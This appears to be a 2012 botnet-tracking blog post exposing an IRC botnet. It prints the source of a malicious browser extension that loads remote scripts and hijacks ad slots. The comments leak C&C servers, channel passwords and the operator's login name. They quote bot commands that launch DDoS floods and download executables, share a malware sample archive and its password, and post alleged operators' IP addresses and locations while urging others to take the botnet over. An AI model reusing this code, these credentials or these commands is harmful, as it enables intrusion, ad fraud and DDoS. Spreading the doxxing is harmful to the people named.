insomnia.incorporatedhosting.info(Insomnia bot hosted in United Kingdom Ovh Systems)

This botnet is found by our anonymous friend here
all credits go to him for this

Server Port
insomnia.incorporatedhosting.info:5656

Channel:
#insomnia k6geyzs

Botnet owner:
Digital from HF and friends

Here Lilyjade extension named Ad Killer Pro (found from our anonymous friend)

//New Lilyjade extension
//Named: Ad Killer Pro
//CrosRider #:4995
//Panel: http://nemsmedia.cloudapp.net

//Extension
appAPI.ready(function($) {
@include "http://nemsmedia.cloudapp.net/Scripts/jquery-1.5.1.min.js"
@include "http://nemsmedia.cloudapp.net/GetExtension.js"
@include "http://46.105.227.94/aab.js"

});



//http://nemsmedia.cloudapp.net/GetExtension.js
var htmlsrc = "";
var ROOTSERVER = 'http://nemsmedia.cloudapp.net';
var SRCSCR = '/Extension/GetAds';

function init() { // Load Calls $(document).ready(function() { initWindow(); }); // Check post-load for ready (may need timer later) var s = document.readyState, getLast = function(){ var elms = document.getElementsByTagName('*'); return elms[elms.length - 1]; }; if (s === 'complete'){ initWindow(); } } // Functions     function aURL(fmid) { return ROOTSERVER + SRCSCR + '/' + fmid; } function findFID(w, h, obj) { var fid = 0; try {     if ((w == 300) && (h == 250)) { fid = 1; } else if ((w == 160) && (h == 600)) { fid = 2; } else if ((w == 728) && (h == 90)) { fid = 3; } else if ((w == 336) && (h == 280)) { fid = 4; } else if ((w == 468) && (h == 60)) { fid = 5; } else if ((w == 234) && (h == 60)) { fid = 6; } else if ((w == 120) && (h == 90)) { fid = 7; } else if ((w == 120) && (h == 600)) { fid = 8; } else if ((w == 120) && (h == 240)) { fid = 9; } else if ((w == 250) && (h == 250)) { fid = 10; } else if ((w == 180) && (h == 150)) { fid = 11; } else if ((w == 200) && (h == 200)) { fid = 12; } else if ((w == 125) && (h == 125)) { fid = 13; } else if ((w == 728) && (h == 15)) { fid = 14; } else if ((w == 468) && (h == 15)) { fid = 15; } else if ((w == 180) && (h == 90)) { fid = 16; } else if ((w == 160) && (h == 90)) { fid = 17; } } catch (z) { } finally { return fid; } } function chkAds() { if(document.body.innerHTML == htmlsrc) { return; } htmlsrc = document.body.innerHTML; domid = "fm_sponsor"; /* TODO *    Optimize timers to prevent slow down *     *    Add to: *     Ebay *     Amazon *     Blogger *     Netflix *     Walmart *     Best Buy */     /* ******************* */ /* *** Enumeration *** */ /* ******************* */ // Enumerate iframes $('iframe[ld!="true"]').each( function(i) { try { $(this).attr("ld", "true"); var h = parseInt($(this).attr('height')); var w = parseInt($(this).attr('width')); var fid = 0; fid = findFID(w, h, $(this).attr('id')); // Update iframe if (fid > 0) { $(this).attr('height', h+10).attr('width', w+10).attr('src', aURL(fid)); } } catch (z) { } }); // Enumerate Flash $('object[ld!="true"]').each( function(i) { try { var h = parseInt($(this).attr('height')); var w = parseInt($(this).attr('width')); var fid = 0; fid = findFID(w, h, this); // Update object if (fid > 0) { $(this).replaceWith('



//http://46.105.227.94/aab.js
<style>
    #cf0d {
        position:fixed!important;
        position:absolute;
        top:0;
        top:expression((t=document.documentElement.scrollTop?document.documentElement.scrollTop:document.body.scrollTop)+"px");
        left:0;
        width:100%;
        height:100%;
        background-color:#fff;
        opacity:0.9;
        filter:alpha(opacity=90);
        display:block
    }
    #cf0d p {
        opacity:1;
        filter:none;
        font:bold 16px Verdana, Arial, sans-serif;
        text-align:center;
        margin:20% 0
    }
    #cf0d p a, #cf0d p i {
        font-size:12px
    }
    #cf0d ~ * {
        display:none
    }
</style>
<noscript>
    <i id=cf0d>
        <p>Please enable JavaScript!
            <br>Bitte aktiviere JavaScript!
            <br>S'il vous pla&icirc;t activer JavaScript!
            <br>Por favor,activa el JavaScript!
            <br>
        </p>
    </i>
</noscript>
<script>
    (function (w, u) {
        var d = w.document,
            z = typeof u;

        function cf0d() {
            function c(c, i) {
                var e = d.createElement('i'),
                    b = d.body,
                    s = b.style,
                    l = b.childNodes.length;
                if (typeof i != z) {
                    e.setAttribute('id', i);
                    s.margin = s.padding = 0;
                    s.height = '100%';
                    l = Math.floor(Math.random() * l) + 1
                }
                e.innerHTML = c;
                b.insertBefore(e, b.childNodes[l - 1])
            }
            function g(i, t) {
                return !t ? d.getElementById(i) : d.getElementsByTagName(t)
            };

            function f(v) {
                if (!g('cf0d')) {
                    c('<p>Please disable your ad blocker!<br>Bitte deaktiviere Deinen Werbeblocker!<br>Veuillez d&eacute;sactiver votre bloqueur de publicit&eacute;!<br>Por favor, desactive el bloqueador de anuncios!<br><a href="http://antiblock.org/?d=2.2.2' + '___' + escape(v) + '">antiblock.org</a> <i>v2.2.2</i></p>', 'cf0d')
                }
            };
            (function () {
                var a = ['ad-728x90-top0', 'ad_global_header2', 'adclear', 'adspot-1x4', 'body_728_ad', 'coverADS', 'sb_advert', 'ad', 'ads', 'adsense'],
                    l = a.length,
                    i, s = '',
                    e;
                for (i = 0; i < l; i++) {
                    if (!g(a[i])) {
                        s += '<a id="' + a[i] + '"></a>'
                    }
                }
                c(s);
                l = a.length;
                for (i = 0; i < l; i++) {
                    e = g(a[i]);
                    if (e.offsetParent == null || (w.getComputedStyle ? d.defaultView.getComputedStyle(e, null).getPropertyValue('display') : e.currentStyle.display) == 'none') {
                        return f('#' + a[i])
                    }
                }
            }());
            (function () {
                var t = g(0, 'img'),
                    a = ['/ad_fill.', '/ad_homepage_', '/adpoint.', '/ads/leaderboard.', '/i/ads/ad', '/mint/ads/ad', '_advertisements/', '_btnad_', '_tile_ad_', '/120x600_'],
                    i;
                if (typeof t[0] != z && typeof t[0].src != z) {
                    i = new Image();
                    i.onload = function () {
                        this.onload = z;
                        this.onerror = function () {
                            f(this.src)
                        };
                        this.src = t[0].src + '#' + a.join('')
                    };
                    i.src = t[0].src
                }
            }());
            (function () {
                var o = {
                    'http://pagead2.googlesyndication.com/pagead/show_ads.js': 'google_ad_client',
                    'http://js.adscale.de/getads.js': 'adscale_slot_id',
                    'http://get.mirando.de/mirando.js': 'adPlaceId'
                },
                    S = g(0, 'script'),
                    l = S.length - 1,
                    n, r, i, v, s;
                d.write = null;
                for (i = l; i >= 0; --i) {
                    s = S[i];
                    if (typeof o[s.src] != z) {
                        n = d.createElement('script');
                        n.type = 'text/javascript';
                        n.src = s.src;
                        v = o[s.src];
                        w[v] = u;
                        r = S[0];
                        n.onload = n.onreadystatechange = function () {
                            if (typeof w[v] == z && (!this.readyState || this.readyState === "loaded" || this.readyState === "complete")) {
                                n.onload = n.onreadystatechange = null;
                                r.parentNode.removeChild(n);
                                w[v] = null
                            }
                        };
                        r.parentNode.insertBefore(n, r);
                        setTimeout(function () {
                            if (w[v] !== null) {
                                f(n.src)
                            }
                        }, 2000);
                        break
                    }
                }
            }())
        }
        if (d.addEventListener) {
            w.addEventListener('load', cf0d, false)
        } else {
            w.attachEvent('onload', cf0d)
        }
    })(window);
</script>

Hosting infos:
http://whois.domaintools.com/176.31.208.105

22 Comments

  • Anonymous says:

    Got some logs from it. Here is the channel:http://pastebin.com/1CwU6rXB
    Notice how everything is being russkilled
    Most interesting thing was another lilyjade
    Infos here:http://pastebin.com/NMkqqu1k
    Notice support for two german ad networks adscale.de and mirando.de has been added.

    Also, here are some of the things downloaded by a single bot that was loaded on. I'm suprised their bots last more than a day or two.
    http://pastebin.com/QZxpHF6w
    https://imgur.com/y1XGV

  • Synn says:

    Lovely 🙂

    Found this a few minutes before you posted it.

    For those looking to take it over, or want to brute for the oper PW, oper UN is Digital

  • Synn says:

    * Now talking on #insomnia
    * Topic for #insomnia is: eWJ2SnRjaXB5TDdJdXNpL3lidklzOGl2eUsvSXE4bWh5YlRKdE1pL3lMZkp0Y2kveUtuSXRNaXJ5TG5JdE1panliWEl1TWkweUxiSnRNaXV5YlRKcjhtaXlhUEpxc21zeWFySnFjbXZ5YlRJcjhpMHlLdklzc2k0eWJYSXI4aWp5Sy9JcHc9PXw0NjAwODYwMw==
    * Topic for #insomnia set by __Digital__ at Fri May 25 07:19:06 2012
    .layer4 37.59.238.173 80 200
    * You are now known as n{US|XP-64a}askgwi
    .stop
    .stop
    .bk

  • Anonymous says:

    I BET YOU ALL FEEL SPECIAL 🙂 WELL ENJOY THE INFO CAUSE I WONT CHANGE IT 🙂 AND GOOD LUCK GETTING ANYTHING FROM IT 🙂

  • Pig says:

    sorry i was not online that's why posts are shoowing up now lol

  • Anonymous says:

    Lily Jade pastebin is down. Here it is again, with a mirror as well.
    http://pastebin.com/ubS6h2Cg
    http://hpaste.org/69070

  • Anonymous says:

    hey SYN heres to you 🙂 sense ya were stupid and used your ip 70.134.52.203

  • Pig says:

    i m adding the code to the post so u dont have to re-upload this again
    very nice job from you "anonymous" guy lol

  • Anonymous says:

    Thanks. May as well dump these as well.
    4thdemo.com:3344 785chelsea #Insomnia
    4thdemo.com:5443 alexandre69 #Channel Password
    4thdemo.com:6667 r3m0hdemoni #Insomnia r3de07, #Jamie
    4thdemo.com:9891 modrica1x1 #MasterBl4ster modricha1x1, #lolba, #Cro4t, #fric
    All are seperate irc servers, but hosted on the same server. Some HF hecker selling to skids.
    Oh, its DeMoNi
    * [DeMoNi] (DeMoNi@hiddenhost-8017995A.w90-7.abo.wanadoo.fr): …
    * [DeMoNi] #Jamie #Insomnia
    * [DeMoNi] jackirc.network :jackirc
    * [DeMoNi] idle 15:11:50, signon: Sat May 26 02:46:16
    * [DeMoNi] End of WHOIS list.
    * [r3m0h] (R3m0h@r3de): …
    * [r3m0h] #Insomnia
    * [r3m0h] jackirc.network :jackirc
    * [r3m0h] is a Network Administrator
    * [r3m0h] is available for help.
    * [r3m0h] idle 04:40:05, signon: Sat May 26 13:18:01
    * [r3m0h] End of WHOIS list.
    Most only have like 10 bots at peak times.

  • Pig says:

    from what i see demoni looks like arab hacker living in france lol he use his real ip

  • Anonymous says:

    Haha demoni ^^
    ".abo.wanadoo."
    lols

  • Synn says:

    "Anonymous said…
    hey SYN heres to you 🙂 sense ya were stupid and used your ip 70.134.52.203"

    That's my IP?

    🙂 Dynamic IP addy ftw. I saw that you tried to DDoS me.

    Router is modified to change my MAC if i get a flood. Took me 15 seconds to "Mitigate" your attack.

    Oh, and tell "Kid" that running ddos attacks, and killing 100+ bots is bad for botnets. Def. when you only haz 500 boats 🙁 (trollface.jpg)

    Btw, i have your oper password.

  • Anonymous says:

    Someone trying to load a ngrbot net off it, located at 46.166.162.130:1993 #ngrs scrt
    File: dl.dropbox.com/s/h19bp0niuc3lt23/ngr.exe
    Another insomnia net also installed on it, located at dk1.zapto.org:6667 #bots owner of this is iDDoS@pie69, file is: http://dl.dropbox.com/u/23547833/lmfao.exe
    Thanks for keeping all the info the same you dumb fucks. All your exes go straight to virustotal.

  • Anonymous says:

    Also, just posted, .dl https://dl.dropbox.com/u/61771932/BsVapor.exe
    Hmm, blackshades. Lets see what the no-ip is. veprex.no-ip.org. Where does that point to? 99.44.92.31. I bet it's a vpn, no lead here. Lets look it up http://whois.domaintools.com/99.44.92.31
    What? AT&T Huston internet services?
    Vapor (The guy who is really into bitcoins) is a dumb fuck who lives in Huston and hosts shit on his own ip.

  • Pig says:

    i m opening new thread with these 2 nets
    keep raping them lol

  • Anonymous says:

    Successful i4i
    Jun 08 21:44:06 <__Digital__> .j #i4i
    #i4i
    <__Digital__> .dl http://up2x.com/u/633370693.68b6ce3688_file.exe
    <__Digital__> .dl http://up2x.com/u/949765942.unknown.exe iunknownv1.no-ip.info:3102
    Jun 08 22:15:31 <__Digital__> .bk

    Bonus: can any one guess what server this one came from? It hasn't been posted here, yet…
    Jun 08 22:58:27 .ruskill on
    Jun 08 22:58:29 .dl http://up2x.com/u/949765942.unknown.exe

  • Pig says:

    they keep using no-ip all time lol
    nice work again
    if u want to post directly here come on irc.abjects.net channel #security and tell me you nick name(i will add you to posters in the blog)

  • Anonymous says:

    I'm banned
    * Cannot join #security (You are banned).
    If you can unban Userbased, I would be glad.
    Also, I meant to post this weeks ago, but the post must have gotten swallowed
    http://www.mediafire.com/?5rggorwl7gi8dwt
    Password: virus
    Loads of logs and samples. Some ircs as well, though some are down by now.
    You can post it if you want to, or just throw the samples in with your next release.

  • Anonymous says:

    funny, alot of this information is wrong 😀

  • Anonymous says:

    you stupid fucks still aint managed to take it over yet nor will you lmfao all tor ranges have been banned against the server so well enjoy trying lmfao you can keep watching tho it makes me feel oh so special <3

  • Pig says:

    litle noob u really think tor is the only alternative when it comes to expose lamers like u ? lol

  • Anonymous says:

    Then why havent you taken it over yet?